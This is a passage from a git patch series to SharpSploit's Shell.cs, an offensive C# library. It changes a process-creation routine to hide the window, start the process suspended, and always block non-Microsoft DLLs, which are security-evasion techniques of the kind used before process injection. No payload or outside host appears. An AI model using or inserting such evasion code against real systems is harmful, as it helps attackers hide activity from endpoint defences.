(uint)Marshal.SizeOf(pSec); tSec.nLength = (uint)Marshal.SizeOf(tSec); - StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + //StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + //StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; IntPtr lpSize = IntPtr.Zero; PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); @@ -386,7 +386,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP if (blockDLL) { - Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); } From e2c5288114bdd565cc7c71b95b2045f109405afe Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 22:45:22 +0200 Subject: [PATCH 7/7] Update Shell.cs --- SharpSploit/Execution/Shell.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index 520fe64..e964478 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -375,8 +375,8 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP pSec.nLength = (uint)Marshal.SizeOf(pSec); tSec.nLength = (uint)Marshal.SizeOf(tSec); - //StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - //StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT | Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED; IntPtr lpSize = IntPtr.Zero;